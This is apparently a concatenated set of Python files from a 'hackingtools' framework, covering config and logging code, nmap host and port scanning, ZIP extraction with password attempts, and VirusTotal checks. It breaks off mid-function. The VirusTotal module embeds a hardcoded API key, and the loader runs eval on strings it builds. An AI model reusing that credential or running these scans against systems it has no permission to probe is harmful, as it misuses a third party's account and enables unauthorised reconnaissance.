# === Treats all the configuration of the app ===

"""
All the configuration is loaded from this file

Currently we support the following 2 public functions and 4 private functions:

Public:

1. **getConfig** - Returns the configuration of some key values you explicitly tell on params (jump to section in [[Config.py#getConfig]] )

2. **getApiKey** - Return an API Key registered into configuration (jump to section in [[Config.py#getApiKey]] )

Private:

1. **__readConfig__** - Read's all the configuration included in your config.json file (jump to section in [[Config.py#__readConfig__]] )

2. **__save_config__** - Save configuration passed as parameter to this function. This, writes into your config.json (jump to section in [[Config.py#__save_config__]] )

3. **__createModuleTemplateConfig__** - This function creates into config.json a template with a simple config for trying in your GUI your functions (jump to section in [[Config.py#__createModuleTemplateConfig__]] )

4. **__look_for_changes__** - Reloads the configuration loaded (jump to section in [[Config.py#__look_for_changes__]] )

"""

import os
import json

global config
config = {}

# === __readConfig__ ===
def __readConfig__():
    """
    Read's all the configuration included in 
    your config.json file
    """
    global config
    config = {}
    with open(os.path.join(os.path.dirname(__file__) , 'config.json')) as json_data_file:
        config = json.load(json_data_file)

# === __save_config__ ===
def __save_config__(new_conf):
    """
    Save configuration passed as parameter
    to this function. This, writes into 
    your config.json
    
    Arguments
    ---------
        new_conf : List
            
            The List with the configuration you 
            want to dump onto the file
    """
    with open(os.path.join(os.path.dirname(__file__) , 'config.json'), 'w', encoding='utf8') as outfile:  
        json.dump(new_conf, outfile, indent=4, ensure_ascii=False)

# === __createModuleTemplateConfig__ ===
def __createModuleTemplateConfig__(module_name):
    """
    This function creates into config.json a template
    with a simple config for trying in your GUI your 
    functions. You would see in configuration file a new 
    ht_yourmodulename key with some more data inside it.
    They are necesary when using the framework GUI for 
    trying the functions.
    
    Arguments
    ---------
        module_name : str
            
            A function name in String that is loaded 
            in your hackingtools library
    """
    global config
    config_tmp = {}
    with open(os.path.join(os.path.dirname(__file__) , 'config.json')) as json_data_file:
        config_tmp = json.load(json_data_file)
    new_config = {
        "__gui_label__" : "_MODULE_GUI_LABEL_",
        "_comment" : "Rename templates if have to use: (remove underscore) 'django_form_main_function' and 'django_form_module_function'",
        "_django_form_main_function_" : {
            "_HTML_FIELD_NAME_" : {
                "__id__" : "_HTML_FIELD_NAME_",
                "__type__" : "_HTML_INPUT_TYPE_",
                "__className__" : "_HTML_INPUT_CLASS_",
                "label_desc" : "_DESCRIPTION_LABEL_",
                "required" : "_IF_REQUIRED_",
                "value" : "_INPUT_VALUE_",
                "loading_text" : "_INPUT_LOADING_TEXT_"
            }
        },
        "_django_form_module_function_" : {
            "_PUBLIC_FUNCTION_" : {
                "__function__" : "_FUNCTION_CALLABLE_NAME_",
                "__async__" : False,
                "__return__" : "_IF_RETURNS_LIKE_TEXT_",
                "_PARAM_TO_USE_IN_VIEWS_PY_" : {
                    "__id__" : "_HTML_FIELD_NAME_",
                    "__type__" : "_HTML_INPUT_TYPE_",
                    "__className__" : "_HTML_INPUT_CLASS_",
                    "label_desc" : "_DESCRIPTION_LABEL_",
                    "value" : "_INPUT_VALUE_",
                    "required" : "_IF_REQUIRED_",
                    "returnable_modules_functions" : {
                        "_MODULE_CALL_FOR_" : [
                            "_THAT_MODULES_FUNCTION"
                        ]
                    }
                }
            }
        }
    }
    new_key_module = 'ht_{mod}'.format(mod=module_name)
    config_tmp['modules'][new_key_module] = new_config
    __save_config__(config_tmp)

# === __look_for_changes__ ===
def __look_for_changes__():
    """
    Reloads the configuration loaded
    
    Returns
    -------
        boolean
            
            Tell's if there where any changes
    """
    global config
    config_tmp = {}
    with open(os.path.join(os.path.dirname(__file__) , 'config.json')) as json_data_file:
        config_tmp = json.load(json_data_file)

    if not sorted(config.items()) == sorted(config_tmp.items()):
        config = config_tmp
        return True
    return False

# === getConfig ===
def getConfig(parentKey, key, subkey=None, extrasubkey=None):
    """
    Returns the configuration of some key values
    you explicitly tell on params
    
    Arguments
    ---------
        parentKey : str
            
            Parent key of the config.json
        key : str
            
            The String of a child into that parent 
            key on the config.json
    
    Keyword Arguments
    -----------------
        subkey : str
            
            The String of a child, into that child, 
            into that parent key on the config.json 
            (default: {None})
        extrasubkey : str
            
            The String of a child, into that child, 
            into the other child, into that parent 
            key on the config.json (default: {None})
    
    Returns
    -------
        List
            
            The content of the config.json you selected 
            into an List / None
    """
    try:
        if extrasubkey:
            try:
                if subkey:
                    try:
                        return config[parentKey][key][subkey][extrasubkey]
                    except:
                        return
            except:
                return
        else:
            try:
                if subkey:
                    try:
                        return config[parentKey][key][subkey]
                    except:
                        return
            except:
                return
        return config[parentKey][key]
    except:
        return None

# === getApiKey ===
def getApiKey(apiName):
    """
    Return an API Key registered into configuration
    
    Arguments
    ---------
        apiName : str
            
            The API Key name in String that is 
            registered into config.json
    
    Returns
    -------
        str
            
            The API Key into your config.json into 
            the apiName you selected / None
    """
    try:
        return config['core']['__API_KEY__'][apiName]
    except:
        return None

__readConfig__()


import inspect
from datetime import datetime
import colorama
from colorama import Fore, Back, Style

from . import Config
config = Config.getConfig(parentKey='core', key='Logger')

colorama.init()

global logs
logs = {}

global DEBUG_CORE_FLAG 
DEBUG_CORE_FLAG = config['DEBUG_CORE_FLAG']

global DEBUG_MODULE_FLAG 
DEBUG_MODULE_FLAG = config['DEBUG_MODULE_FLAG']

global DEBUG_USER 
DEBUG_USER = config['DEBUG_USER']

if config['clear_on_load']:
    print(colorama.ansi.clear_screen()) # Clear Screen Code

def setDebugCore(on=True):
    """Function for establising DEBUG_CORE_FLAG to True/False
    
    Keyword Arguments:
        on {boolean} -- Set's True or False the Debug messages for Core Logger calls (default: {True})
    """
    global DEBUG_CORE_FLAG
    DEBUG_CORE_FLAG = on

def setDebugModule(on=True):
    """Function for establising DEBUG_MODULE_FLAG to True/False
    
    Keyword Arguments:
        on {boolean} -- Set's True or False the Debug messages for Module Logger calls (default: {True})
    """
    global DEBUG_MODULE_FLAG
    DEBUG_MODULE_FLAG = on

def setDebug(on=True):
    """Function for establising DEBUG_USER to True/False
    
    Keyword Arguments:
        on {boolean} -- Set's True or False the Debug messages for User Logger calls (default: {True})
    """
    global DEBUG_USER
    DEBUG_USER = on

def saveLog():
    """Creates a file with the log created by the library since loaded last time.
    Output format can be changed into config.json
    """
    time_now = datetime.utcnow().strftime(config['log_save_date_format'])[:-3]
    with open('log-{time}.txt'.format(time=time_now), 'w') as f:
        for log in logs:
            f.write("{log}\n".format(log=log))

def printMessage(message, description=None, debug_module=False, debug_core=False, is_error=False, color=None):
    """This function prints a pretty message in console. The colors can be changed in config.json
    
    Arguments:
        message {String} -- The main message you want to show on console log
    
    Keyword Arguments:
        description {String} -- The description of the message you are showing (default: {None})
        debug_module {bool} -- Tell's if the message is been called from a module (default: {False})
        debug_core {bool} -- Tell's if the message is been called from any core file (default: {False})
        is_error {bool} -- For showing in other color because been an error (default: {False})
        color {[type]} -- A color for showing with other color (default: {None})
    """
    filename = inspect.stack()[1].filename
    methodName = inspect.stack()[1].function
    
    if methodName.startswith('<'):
        methodCalledFrom = filename.split('\\')[-1]
    else:
        methodCalledFrom = '{file}.{function}()'.format(file=filename.split('\\')[-1], function=methodName)
    
    time_now = datetime.utcnow().strftime(config['log_print_date_format'])[:-3]

    colorMessage = Fore.LIGHTMAGENTA_EX

    if color:
        colorMessage = color

    if is_error:
        colorMessage = Fore.RED

    if ((not debug_module) and (not debug_core) and (DEBUG_USER)) or ((debug_module) and (DEBUG_MODULE_FLAG)) or ((debug_core) and (DEBUG_CORE_FLAG)):
        if description:
            logs[time_now] = '{methodCalledFrom} - {message} - {description}'.format(methodCalledFrom=methodCalledFrom, message=message, description=description)
            print('{timeColorStart}[{time}]{timeColorEnd} - {methodCalledFromColorStart}{methodCalledFrom}{methodCalledFromColorEnd} - {messageColorStart}{message}{messageColorEnd} - {description}'.format(
                timeColorStart=Fore.BLUE, 
                timeColorEnd=Fore.WHITE, 
                time=time_now,
                methodCalledFromColorStart=Fore.GREEN, 
                methodCalledFrom=methodCalledFrom,
                methodCalledFromColorEnd=Fore.WHITE,
                messageColorStart=colorMessage,
                message=message,
                messageColorEnd=Fore.WHITE,
                description=description))
        else:
            logs[time_now] = '{methodCalledFrom} - {message}'.format(methodCalledFrom=methodCalledFrom, message=message)
            print('{timeColorStart}[{time}]{timeColorEnd} - {methodCalledFromColorStart}{methodCalledFrom}{methodCalledFromColorEnd} - {messageColorStart}{message}{messageColorEnd}'.format(
                timeColorStart=Fore.BLUE, 
                timeColorEnd=Fore.WHITE, 
                time=time_now,
                methodCalledFromColorStart=Fore.GREEN, 
                methodCalledFrom=methodCalledFrom,
                methodCalledFromColorEnd=Fore.WHITE,
                messageColorStart=colorMessage,
                message=message,
                messageColorEnd=Fore.WHITE))


from hackingtools.core import Logger, Config
import hackingtools as ht
import os

config = Config.getConfig(parentKey='modules', key='ht_instagram')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

class StartModule():
    
    def __init__(self):
        pass
        
    def help(self):
        return ht.getFunctionsNamesFromModule('ht_instagram')


from hackingtools.core import Logger, Utils, Config
import hackingtools as ht
import os

from zipfile import ZipFile

config = Config.getConfig(parentKey='modules', key='ht_unzip')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

class StartModule():

	def __init__(self):
		Utils.emptyDirectory(output_dir)
		pass

	def help(self):
		Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_unzip'))

	def extractFile(self, zipPathName, password='', posible_combinations=1, output_dir_new=None):
		#ZipFile only works with 7z with ZypCrypto encryption for setting the password
		try:
			Logger.printMessage(message="extractFile", description='ZIP - {pwd} - {msg_posible_comb}: {com}'.format(pwd=password, msg_posible_comb=config['posible_combinations'], com=posible_combinations), debug_core=True)
			with ZipFile(zipPathName) as zf:
				zf.extractall(output_dir if not output_dir_new else output_dir_new, pwd=str.encode(password))
			return password
		except Exception as e:
			Logger.printMessage(message="extractFile", description=str(e), is_error=True)
			return None
	
	def zipFiles(self, files, new_folder_name):
		# Creates a Zip File from a list of files and a foldername for the new zip file
		new_zip = os.path.join(output_dir, '{n}.zip'.format(n=new_folder_name.split('.')[0]))
		zipF = ZipFile(new_zip, "w")
		for fpath in files:
			fdir, fname = os.path.split(fpath)
			zip_path = os.path.join(output_dir, new_folder_name, fname)
			zipF.write(fpath, zip_path)
		zipF.close()
		return new_zip 


from hackingtools.core import Logger, Config
import hackingtools as ht

import nmap
import os

config = Config.getConfig(parentKey='modules', key='ht_nmap')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

class StartModule():

	cacheSearchInfo = []
	
	def __init__(self):
		pass

	def help(self):
		Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_nmap'))

	def saveCacheSearchInfo(self, activate=False):
		pass

	def getConnectedDevices(self, ip):
		Logger.printMessage(message='{methodName}'.format(methodName='getConnectedDevices'), description='{param}'.format(param=ip), debug_module=True)
		nm = nmap.PortScanner()
		results = nm.scan(ip, '-sP')
		hosts = []
		for host in results.all_hosts():
			if results[host].state() == 'up':
				hosts.append(host)
		return hosts

	def getDevicePorts(self, ip, tcp=True, udp=False):
		Logger.printMessage(message='{methodName}'.format(methodName='getDevicePorts'), description='{param} - TCP {tcp} - UDP {udp}'.format(param=ip, tcp=tcp, udp=udp), debug_module=True)
		nm = nmap.PortScanner()
		results = nm.scan(ip)
		try:
			if tcp and not udp:
				return Utils.getValidDictNoEmptyKeys(results["scan"][ip]["tcp"])
			if udp and not tcp:
				return Utils.getValidDictNoEmptyKeys(results["scan"][ip]["udp"])
			if tcp and udp:
				return Utils.getValidDictNoEmptyKeys([results["scan"][ip]["tcp"],results["scan"][ip]["udp"]])
			return Utils.getValidDictNoEmptyKeys(results["scan"][ip]["tcp"])
		except:
			return []

	def hasDevicePortOpened(self, ip, port):
		Logger.printMessage(message='{methodName}'.format(methodName='hasDevicePortOpened'), description='{param}:{param2}'.format(param=ip, param2=port), debug_module=True)
		nm = nmap.PortScanner()
		results = nm.scan(ip)
		exists = False
		try:
			for host in results.all_hosts():
				if exists:
					break
				if not exists:
					exists = results[host].has_tcp(port)
				if not exists:
					exists = results[host].has_udp(port)
		except:
			print(results)
			raise
		return exists



from hackingtools.core import Logger, Utils, Config
import hackingtools as ht
import os
import time
import json

from hashlib import md5
from virustotal_python import Virustotal

config = Config.getConfig(parentKey='modules', key='ht_virustotal')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

class StartModule():

	def __init__(self):
		self.vtotal = Virustotal("9334cb7d7d9807f2c508a0eb025c9e2fdaa6c9ce907ccf7326a93bee5fbef172")
		pass

	def help(self):
		Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_virustotal'))

	def isBadFileHash(self, fileHash):
		try:
			resp = self.vtotal.file_report([fileHash])
			if resp["status_code"] in (200, 204):
				if resp["status_code"] == 204:
					Logger.printMessage(message="isBadFileHash", description="Testing - {hash} - Waiting 2 seconds...".format(hash=fileHash))
					time.sleep(2)
					return self.isBadFileHash(fileHash)
				while resp["json_resp"]["response_code"] == -2:
					Logger.printMessage(message="isBadFileHash", description="Testing - {hash} - Waiting 2 seconds...".format(hash=fileHash))
					time.sleep(2)
					return self.isBadFileHash(fileHash)
				no_detected_list = []
				detected_list = []
				detected_types = []
				for antivirus in resp["json_resp"]["scans"]:
					if resp["json_resp"]["scans"][antivirus]["detected"]:
						detected_list.append((antivirus, resp["json_resp"]["scans"][antivirus]["version"]))
						if not resp["json_resp"]["scans"][antivirus]["result"] in detected_types:
							detected_types.append(resp["json_resp"]["scans"][antivirus]["result"])
					else:
						no_detected_list.append((antivirus, resp["json_resp"]["scans"][antivirus]["version"]))
				if detected_list:
					data = {}
					data["detected_list"] = detected_list
					data["detected_types"] = detected_types
					data["no_detected_list"] = no_detected_list
					return json.dumps({"Detected":data}, indent=4, sort_keys=True)
				return json.dumps({"No detected":no_detected_list}, indent=4, sort_keys=True)
			return resp
		except Exception as e:
			Logger.printMessage(message="isBadFileHash", description=str(e), is_error=True)
			return str(e)

	def isBadFile(self, filename):
		try:
			Logger.printMessage(message="isBadFile", description=filename)
			response = self.vtotal.file_scan(filename)
			if response["status_code"] == 200:
				scan_id = str(response["json_resp"]["scan_id"])
				time.sleep(2)
				resp = self.isBadFileHash(scan_id)
				return resp
		except Exception as e:
			print(e)
			Logger.printMessage(message="isBadFile", description=str(e), is_error=True)
			return str(e)


from .core import Config, Utils, Logger
config = Config.getConfig(parentKey='core', key='import_modules')
config_locales = Config.getConfig(parentKey='core', key='locales')
from colorama import Fore, Back, Style

import os, time, sys, threading
from os import listdir
from os.path import isfile, join
import importlib
import types
import inspect
import ast
import progressbar
import requests
import sys
from django.urls import resolve
from importlib import reload

try:
    from pip import main as pipmain
except ImportError:
    from pip._internal import main as pipmain

modules_loaded = {}

nodes_pool = []
MY_NODE_ID = Utils.randomText(length=32, alphabet='mixalpha-numeric-symbol14')
global WANT_TO_BE_IN_POOL
WANT_TO_BE_IN_POOL = Config.getConfig(parentKey='core', key='WANT_TO_BE_IN_POOL')
if WANT_TO_BE_IN_POOL:
    Logger.printMessage('Loaded in pool as', MY_NODE_ID, debug_module=True)

https = '' # Anytime when adding ssl, shold be with an 's'

public_ip = Utils.getMyPublicIP()
lan_ip = Utils.getMyLanIP()
local_ip = Utils.getMyLocalIP()

try:
    listening_port = sys.argv[-1].split(':')[1]
except:
    listening_port = '8000'

this_dir = os.path.dirname(os.path.abspath(__file__))

blacklist_extensions = config['blacklist_extensions']
blacklist_directories = config['blacklist_directories']
ignore_files = config['ignore_files']
ignore_folders = config['ignore_folders']
class_name_starts_with_modules = config['class_name_starts_with_modules']
function_name_starts_with_modules = config['function_name_starts_with_modules']
function_param_exclude = config['function_param_exclude']
default_class_name_for_all = config['default_class_name_for_all']

default_template_modules_ht = config['default_template_modules_ht']

package = config['package_name']

# === getModulesJSON ===
def getModulesJSON():
    """
    Returns an Array with the modules loaded

    Parameters
    ----------
        None

    Return
    ----------
        Array
    """
    conf = {}
    for mod in modules_loaded:
        if isinstance(modules_loaded[mod], str):
            conf[mod] = '1 function'
        else:
            conf[mod] = '{func} functions'.format(func=len(modules_loaded[mod]))
    #Logger.printMessage('Modules loaded as JSON automatically:', conf, debug_module=True)
    return modules_loaded

def getFunctionsNamesFromModule(module_name):
    """Returns an Array with the functions of a module you choose

    Parameters
    ----------
        module_name = String

    Return
    ----------
        Array
    """
    try:
        for mod in modules_loaded:
            if module_name in mod and not isinstance(modules_loaded[mod], str):
                return list(modules_loaded[mod].keys())
            elif module_name in mod:
                return list(modules_loaded[mod])
        return []
    except:
        return []

def getModulesCalls():
    """Return an Array with the modules calls you can write for importing directly a module.
    Also, it logs into your console the calls formated for well reading.

    Parameters
    ----------
        None

    Return
    ----------
        Array
    """
    Logger.printMessage('Modules :', debug_module=True)
    modulesCalls = []
    for mods in getModules():
        Logger.printMessage('\t{text}'.format(text=mods), color=Fore.YELLOW, debug_module=True)
        modulesCalls.append(mods)
    return modulesCalls

def getModulesFunctionsCalls():
    """Return's an Array with modules name as keys and inside it's values, 
    the key are the functions call names with a value of a template for 
    initialaizing and calling that function

    Parameters
    ----------
        None

    Return
    ----------
        Array
    """
    modulesCalls = {}
    header = 'import hackingtools as ht\n\nht_mod = ht.getModule("{module_name}")\nmod_result = ht_mod.{module_function}({module_function_params})\n\nprint(mod_result)'
    for module in modules_loaded:
        module_funcs = {}
        for func in modules_loaded[module]:
            try:
                for param in modules_loaded[module][func]:
                    module_funcs[func] = header.format(module_name=module.split('.')[-1], module_function=func, module_function_params=', '.join(modules_loaded[module][func][param]))
            except:
                module_funcs[func] = header.format(module_name=module.split('.')[-1], module_function=func, module_function_params='')
        modulesCalls[module.split('.')[-1]] = module_funcs
    return modulesCalls

def getModulesNames():
    """Return's an Array with all the modules loaded names (ht_shodan, ht_nmap, etc.)

    Parameters
    ----------
        None

    Return
    ----------
        Array
    """
    modules_names = []
    for tools in modules_loaded:
        modules_names.append(tools.split('.')[-1])
    return modules_names

def getModulesGuiNames():
    """Return's an Array with the Label for GUI for that module

    Parameters
    ----------
        None

    Return
    ----------
        Array
    """
    names = []
    for tool in getModulesNames():
        label = Config.getConfig(parentKey='modules', key=tool, subkey='__gui_label__')
        if label:
            names.append(label)
    return names

def getModulesFullConfig():
    """Return's an Array with all the config of all modules loaded

    Parameters
    ----------
        None

    Return
    ----------
        Array
    """
    modules_conf = {}
    for module in getModulesNames():
        module_conf = Config.getConfig(parentKey='modules', key=module)
        if module_conf:
            modules_conf[module] = module_conf
    return modules_conf

def getModulesModalTests():
    """Return's an Array with all modules as keys and their values, the Modal GUI function forms

    Parameters
    ----------
        None

    Return
    ----------
        Array
    """
    tools_functions = {}
    for tool in getModulesNames():
        tool_functions = Config.getConfig(parentKey='modules', key=tool, subkey='django_form_module_function')
        if tool_functions:
            tools_functions[tool] = tool_functions
    return tools_functions

def __getModulesConfig_treeView__():
    """Return a String with the config for the GUI Treeview

    Parameters
    ----------
        None

    Return
    ----------
        String
    """
    count = 1
    result_text = []
    tools_config = getModulesFullConfig()
    __treeview_load_all__(config=tools_config, result_text=result_text)
    response =  ','.join(result_text)
    return response

global __treeview_counter__
__treeview_counter__ = 0

def __treeview_load_all__(config, result_text, count=0, count_pid=-1):
    """Loads the GUI Treeview with the config of all the modules loaded

    Parameters
    ----------
        config = Array
        result_text = String
        count = int
        count_pid = int

    Return
    ----------
        None
    """
    open_key = "{"
    close_key = "}"
    count += 1
    count_pid += 1
    for c in config:
        count += 1
        count = __treeview_count__(count)
        result_text.append(__treeview_createJSON__(conf_key=config[c], key=c, count=count, pid=count_pid))
        Logger.printMessage('{msg} - {key} - {n} - {m}'.format(msg='Pasando por: ', key=c, n=count, m=count_pid), color=Fore.YELLOW, debug_core=True)
        if not isinstance(config[c], str) and not isinstance(config[c], bool) and not isinstance(config[c], int) and not isinstance(config[c], float):
            try:
                __treeview_load_all__(config=config[c],result_text=result_text, count=count, count_pid=count-1)
                count += 1
            except:
                try:
                    __treeview_load_all__(config=tuple(config[c]),result_text=result_text, count=count, count_pid=count-1)
                    count += 1
                    Logger.printMessage('{msg} - {key} - {conf_key}'.format(msg=config_locales['error_json_data_loaded'], key=c, conf_key=config[c]), color=Fore.YELLOW, debug_core=True)
                except:
                    Logger.printMessage('{msg} - {key} - {conf_key}'.format(msg=config_locales['error_json_data_not_loaded'], key=c, conf_key=config[c]), color=Fore.RED, debug_core=True)
        count += 1

def __treeview_count__(count):
    global __treeview_counter__
    if count < __treeview_counter__:
        count = __treeview_counter__
    count += 1
    __treeview_counter__ = count
    return count
    
def __treeview_createJSON__(conf_key, key, count=1, pid=0):
    """Return JSON String with the config for the treeview

    Parameters
    ----------
        conf_key = String
        key = String
        count = int
        pid = int

    Return
    ----------
        String JSON Format
    """
    try:
        open_key = "{"
        close_key = "}"
        if isinstance(conf_key, str):
            return '{open_key}id:{count},name:"{name}",pid:{pid},value:"{value}"{close_key}'.format(open_key=open_key, count=count, name=key, pid=pid, value=conf_key, close_key=close_key)
        else:
            return '{open_key}id:{count},name:"{name}",pid:{pid},value:""{close_key}'.format(open_key=open_key, count=count, name=key, pid=pid, close_key=close_key)
    except:
        Logger.printMessage('{msg} - {key} - {conf_key}'.format(msg=config_locales['error_load_json_data'], key=key, conf_key=conf_key), color=Fore.RED)

def setDebugCore(on=True):
    """Set Debug Log from Core to on/off

    Parameters
    ----------
        on = boolean (True/False)

    Return
    ----------
        None
    """
    Logger.setDebugCore(on)

def setDebugModule(on=True):
    """Set Debug Log from Modules to on/off

    Parameters
    ----------
        on = boolean (True/False)

    Return
    ----------
        None
    """
    Logger.setDebugModule(on)
    
def getModule(moduleName):
    """Return's and load's a module into a variable passing a module name as parameter

    Parameters
    ----------
        moduleName = String

    Return
    ----------
        eval(module)
    """
    Logger.printMessage('Initiation of {moduleName}'.format(moduleName=moduleName), debug_module=True)
    for m in modules_loaded:
        if moduleName in m:
            if not 'ht_' in moduleName:
                moduleName = 'ht_{m}'.format(m=moduleName)
            sentence = 'modules.{category}.{mod}.{moduleName}.StartModule()'.format(category=m.split('.')[1], mod=moduleName.split('_')[1], moduleName=moduleName)
            return eval(sentence)
    Logger.printMessage('Looks like {mod} is not loaded on HackingTools. Look the first import in log. You could have some error in your code :)'.format(mod=moduleName), is_error=True)

def getModuleConfig(moduleName):
    """Return's an Array with the config of a module passed as parameter

    Parameters
    ----------
        moduleName = String

    Return
    ----------
        Array/None
    """
    if moduleName in getModulesNames():
        actualConf = getModulesJSON()
        for mod in actualConf:
            if moduleName in mod.split('.')[-1]:
                return actualConf[mod]
    return None

#TODO Continue documentation here

# Nodes Pool Treatment

def switchPool():
    global WANT_TO_BE_IN_POOL
    if WANT_TO_BE_IN_POOL:
        WANT_TO_BE_IN_POOL = False
    else:
        WANT_TO_BE_IN_POOL = True

def addNodeToPool(node_ip):
    if not node_ip in nodes_pool:
        nodes_pool.append(node_ip)

def send(node_request, functionName):
    creator_id = MY_NODE_ID
    pool_nodes = getPoolNodes()
    try:
        if WANT_TO_BE_IN_POOL:
            function_api_call = resolve(node_request.path_info).route
            pool_it = node_request.POST.get('__pool_it_{func}__'.format(func=functionName), False)
            if pool_it:
                if pool_nodes:
                    params = dict(node_request.POST)
                    params['pool_list'] = pool_nodes
                    if not 'creator' in params:
                        params['creator'] = creator_id
                    response, creator = sendPool(creator=params['creator'], function_api_call=function_api_call, params=dict(params), files=node_request.FILES)
                    if 'creator' in params and params['creator'] == creator_id and response:
                        return (str(response.text), False)
                    if response:
                        return (response, creator)
                    return (None, None)
                else:
                    return (None, None)
            else:
                Logger.printMessage(message='send', description='{n} - {f} - Your config should have activated "__pool_it_{f}__" for pooling the function to other nodes'.format(n=node_request, f=functionName), color=Fore.YELLOW, debug_core=True)
                return (None, None)
        else:
            Logger.printMessage(message='send', description='Disabled pool... If want to pool, change WANT_TO_BE_IN_POOL to true', color=Fore.YELLOW)
            return (None, None)
    except Exception as e:
        raise
        Logger.printMessage(message='send', description=str(e), is_error=True)
        return (None, None)

def sendPool(creator, function_api_call='', params={}, files=[]):
    my_public_ip = local_ip
    my_service_api = 'http{s}://{ip}:{port}'.format(s=https, ip=my_public_ip, port=listening_port)
    try:
        nodes_pool.remove(my_service_api)
    except:
        pass
    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'}
    nodes = []
    pool_list=[]
    pool_counter = 0
    try:
        pool_list = params['pool_list']
    except:
        pass
    try:
        pool_list.remove(my_service_api)
    except:
        pass    
    # Get nodes aren't notified into nodes
    for node in nodes_pool:
        if not node in pool_list:
            nodes.append(node)
            pool_list.append(node)
    # I save pool_list items i don't have yet on my pools 
    for node in pool_list:
        if not node in nodes_pool:
            nodes.append(node)
            if not my_service_api in node:
                nodes_pool.append(node)
    if len(nodes) > 0:
        if not my_service_api in pool_list:
            pool_counter += 1
            for node in nodes:
                try:
                    if not node in (public_ip, lan_ip) and not node == 'http{s}://{ip}:{port}'.format(s=https, ip=local_ip, port=listening_port):
                        node_call = '{node_ip}/{function_api}'.format(node_ip=node, function_api=function_api_call)

                        params['pool_list'] = pool_list
                        try:
                            params['pool_list'].append(my_service_api)
                            params['pool_list'].remove(node)
                        except:
                            pass
                            
                        params['is_pool'] = True

                        r = requests.post(node_call, files=files, data=params, headers=headers)

                        if r.status_code == 200:
                            return (r, params['creator'])
                except Exception as e:
                    raise
                    Logger.printMessage(str(e), color=Fore.YELLOW)
        else:
            Logger.printMessage('Returned to me my own function called into the pool', debug_module=True)
    else:
        Logger.printMessage('There is nobody on the pool list', debug_module=True)

    return (None, None)

def getPoolNodes():
    return nodes_pool

# Import Modules

# Core method - Usado por: __importModules__()
def __listDirectory__(directory, files=False, exclude_pattern_starts_with=None):
    """
    Devuelve las carpetas contenidas en el directorio indicado. Si se quieren listar los 
    ficheros se deberá indicar el argumento files=True. En el caso de querer excluir ficheros o carpetas
    se indicará en el argumento exclude_pattern_starts_with con el comienzo de los mismos.
    """
    mypath = os.path.join(this_dir, directory)
    data = ''

    if files:
        data = [f for f in listdir(mypath) if isfile(join(mypath, f))]
    else:
        data = [f for f in listdir(mypath) if not isfile(join(mypath, f))]
    
    if blacklist_extensions:
        new_data = []
        for d in data:
            has_extension = False
            for black_ext in blacklist_extensions:
                if black_ext in d:
                    has_extension = True
            if not has_extension:
                new_data.append(d)
        data = new_data

    if exclude_pattern_starts_with: 
        new_data = []
        for d in data:
            if not d.startswith(exclude_pattern_starts_with):
                new_data.append(d)
        data = new_data

    if blacklist_directories:
        new_data = []
        for d in data:
            for direc in blacklist_directories:
                if not direc in d:
                    new_data.append(d)
        data = new_data

    if ignore_folders:
        new_data = []
        for d in data:
            exists = False
            for direc in ignore_folders:
                if direc in d:
                    exists = True
            if not exists:
                new_data.append(d)
        data = new_data
    
    if files and ignore_files:
        new_data = []
        for d in data:
            for file_ign in ignore_files:
                if not file_ign in d:
                    new_data.append(d)
        data = new_data

    return data

# Core method - Usado por: __importModules__()
def __getModules__(directory='', exclude_pattern_starts_with='.'):
    """
    Devuelve las carpetas o ficheros contenidas en cada módulo del directorio actual, expluyendo de la raiz 
    los directorios que empiecen por punto. 
    """
    data = {}
    dirs = __listDirectory__(directory=directory, exclude_pattern_starts_with=exclude_pattern_starts_with)
    if dirs:
        for d in dirs:
            if not os.path.isfile(d):
                sub_dirs = __listDirectory__(directory = d) #Tengo que excluir el __pycache__
                data[d] = {}
                for sub in sub_dirs: # Tipo de Herramientas (OSINT, SQLi, etc.)
                    sub_dirs_tools = __listDirectory__(directory = '{d}/{sub}'.format(d=d, sub=sub))
                    data[d][sub] = {}
                    for tool in sub_dirs_tools:
                        sub_dirs_tool_files = __listDirectory__(directory = '{d}/{sub}/{tool}'.format(d=d, sub=sub, tool=tool), files=True)
                        data[d][sub][tool] = sub_dirs_tool_files
                subdirectorio = __listDirectory__(directory = d, files=True)
                if len(subdirectorio) > 0:
                    data[d]['files'] = subdirectorio
            else:
                try:
                    data['files'].append(d)
                except:
                    data['files'] = []
                    data['files'].append(d)
    else:
        dirs_files = __listDirectory__(directory = directory, files=True)
        data[directory] = dirs_files
    return data

# Core method - Usado por: __importModules__()
def __methodsFromModule__(cls):
    """
    Devuelve los métodos que tiene una clase pasada como parametro
    """
    return [x for x in dir(getattr(cls, default_class_name_for_all)) if not x.startswith(function_name_starts_with_modules)]

def __methodsFromPythonFile__(obj):
    return [x for x in dir(obj) if not x.startswith(function_name_starts_with_modules)]

# Core method - Usado por: __importModules__()
def __classNameFromModule__(cls):
    return [x for x in dir(cls) if inspect.isclass(getattr(cls, x)) and x.startswith(class_name_starts_with_modules)]

def __createHtmlModalForm__(mod, config_subkey='django_form_main_function', config_extrasubkey=None):
    module_form = Config.getConfig(parentKey='modules', key=mod, subkey=config_subkey, extrasubkey=config_extrasubkey)
    if not module_form:
        return
    
    html = "<div class=\"modal-body\">"
    footer = '<div class="modal-footer">'
    m_form = module_form

    # For ajax
    submit_id = ''

    for m in m_form:
        temp_m_form = m_form
        if not m == '__async__' and (('systems' in temp_m_form[m] and os.name in temp_m_form[m]['systems']) or not 'systems' in temp_m_form[m]):
            if '__type__' in temp_m_form[m] and '__id__' in temp_m_form[m] and '__className__' in temp_m_form[m]:
                input_type = temp_m_form[m]['__type__']
                input_id = temp_m_form[m]['__id__']
                input_class = temp_m_form[m]['__className__']
                
                input_placeholder = ''
                if 'placeholder' in temp_m_form[m]:
                    input_placeholder = temp_m_form[m]['placeholder']
                
                input_label_desc = ''
                if 'label_desc' in temp_m_form[m]:
                    input_label_desc = temp_m_form[m]['label_desc']
                
                input_value = ''
                if 'value' in temp_m_form[m]:
                    input_value = temp_m_form[m]['value']
                
                checkbox_selected = False
                if 'selected' in temp_m_form[m]:
